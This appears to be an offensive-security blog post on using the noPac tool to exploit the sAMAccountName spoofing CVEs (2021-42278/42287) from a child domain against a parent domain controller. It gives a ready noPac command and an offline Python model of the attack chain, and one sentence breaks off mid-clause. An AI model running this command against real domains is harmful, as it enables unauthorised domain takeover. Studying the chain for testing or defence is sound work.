sAMAccountName Spoofing in the Forest
Exploiting sAMAccountName spoofing (CVE-2021-42278 & CVE-2021-42287) from a child domain can lead to compromise of the parent domain.
The parent domain can be compromised from a user of the child domain using noPac.exe, the sAMAccountName spoofing exploit written by cube0x0. I noticed that he did not give an example command for compromising the parent domain, so here is one.
unsafe.local = parent domain
gotham.unsafe.local = child domain
user1 = user of the gotham domain
For the scenario above, you must set the `-dc` parameter to a domain controller of the parent domain and must not specify the `-domain` parameter: if you specify the parent domain name together with the credentials of a child-domain user, an invalid credentials error occurs in the
If you specify the child domain name instead, noPac adds the machine account to `gotham.unsafe.local`, which defeats our objective. So `NetworkCredential.argDomain` should be left empty; the username and password alone are enough to connect to the parent DC (thanks to the trust relationship). You can see this at line 399.
The domain name required for adding the machine account is extracted from the specified DC name (line 421).
```
noPac.exe -user [child-user] -pass [pass] -dc [parent-dc] -mAccount [machine-name] -mPassword [machine-pass] -service cifs -ptt
```
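To make the parameter handling above concrete, here is an offline walk-through of the chain noPac automates against the parent domain. It is an added example written for this page, not cube0x0's noPac code: the directory and KDC are toy in-memory stand-ins, the names `dc01.unsafe.local` and `fakepc` are constructed, and deriving the target domain by stripping the host label from the DC FQDN is an assumption about what noPac's line 421 does. It shows why `-domain` must stay empty (the account must land in the domain derived from `-dc`), why the spoofed sAMAccountName is the DC's name without the trailing `$`, and why the service ticket comes back for the DC after the rename.

```python
"""Offline model of the sAMAccountName spoofing chain (CVE-2021-42278 +
CVE-2021-42287) that noPac automates against the parent domain.

Added example for this page, not cube0x0's noPac code. ToyDirectory and
ToyKDC stand in for the parent DC's LDAP and Kerberos services; every name
below is constructed."""

from dataclasses import dataclass, field
from typing import Optional


def resolve_target_domain(dc_fqdn: str, domain_arg: Optional[str] = None) -> str:
    """Which domain the machine account lands in.

    With -domain omitted, the domain comes from the DC name (the page's
    line 421); we ASSUME that means the FQDN minus its host label. Passing
    the child domain explicitly would create the account there instead."""
    if domain_arg:
        return domain_arg.lower()
    _host, _, domain = dc_fqdn.lower().partition(".")
    if not domain:
        raise ValueError("pass the DC as an FQDN so the domain can be derived")
    return domain


def spoof_sam(dc_fqdn: str) -> str:
    """sAMAccountName to impersonate: the DC's computer name WITHOUT the '$'."""
    return dc_fqdn.lower().split(".", 1)[0]


@dataclass
class Account:
    sam: str
    spns: list = field(default_factory=list)


class ToyDirectory:
    """In-memory stand-in for one domain's LDAP directory."""

    def __init__(self, domain: str, dc_host: str):
        self.domain = domain
        dc_sam = f"{dc_host}$"
        self.accounts = {dc_sam: Account(dc_sam, [f"cifs/{dc_host}.{domain}"])}

    def add_machine(self, name: str) -> Account:
        # ms-DS-MachineAccountQuota lets an ordinary authenticated user (here
        # one from the child domain, via the trust) add a computer object.
        sam = f"{name}$"
        if sam in self.accounts:
            raise ValueError("machine account already exists")
        acct = Account(sam, [f"HOST/{name}.{self.domain}"])
        self.accounts[sam] = acct
        return acct

    def modify(self, sam: str, new_sam: Optional[str] = None,
               spns: Optional[list] = None) -> None:
        acct = self.accounts.pop(sam)
        if spns is not None:
            acct.spns = spns
        if new_sam is not None:
            # Uniqueness is only checked against existing names: "dc01" and
            # "dc01$" are different strings, so the rename succeeds (CVE-2021-42278).
            if new_sam in self.accounts:
                raise ValueError("sAMAccountName not unique")
            acct.sam = new_sam
        self.accounts[acct.sam] = acct


class ToyKDC:
    def __init__(self, directory: ToyDirectory):
        self.d = directory

    def as_req(self, sam: str) -> dict:
        if sam not in self.d.accounts:
            raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        return {"cname": sam}  # the TGT names the client by sAMAccountName

    def s4u2self(self, tgt: dict, service: str) -> dict:
        """Pre-patch behaviour: if the TGT's cname no longer exists, the KDC
        retries the lookup with '$' appended (CVE-2021-42287)."""
        name = tgt["cname"]
        if name not in self.d.accounts:
            name = f"{name}$"
            if name not in self.d.accounts:
                raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        acct = self.d.accounts[name]
        spn = next((s for s in acct.spns if s.startswith(f"{service}/")), None)
        if spn is None:
            raise LookupError("no SPN for requested service")
        return {"issued_for": acct.sam, "spn": spn}


def run_chain(dc_fqdn: str, machine: str, service: str = "cifs") -> dict:
    """The noPac sequence against the domain derived from -dc."""
    domain = resolve_target_domain(dc_fqdn)          # -domain left empty
    target = spoof_sam(dc_fqdn)
    d = ToyDirectory(domain, target)
    kdc = ToyKDC(d)
    acct = d.add_machine(machine)                    # 1. new machine account (-mAccount)
    d.modify(acct.sam, spns=[])                      # 2. clear SPNs so the rename is permitted
    d.modify(acct.sam, new_sam=target)               # 3. sAMAccountName -> "dc01"
    tgt = kdc.as_req(target)                         # 4. TGT for "dc01"
    d.modify(target, new_sam=f"{machine}$")          # 5. rename back; "dc01" no longer exists
    return kdc.s4u2self(tgt, service)                # 6. ST issued for dc01$ (-service cifs)
```

`run_chain("dc01.unsafe.local", "fakepc")` returns a ticket issued for `dc01$` on `cifs/dc01.unsafe.local`, which is what the `-ptt` step loads into the session. Note that if `resolve_target_domain` were called with `gotham.unsafe.local`, the computer object would be created in the child directory and the spoofed name would never match the parent DC, which is exactly why the `-domain` parameter must be omitted.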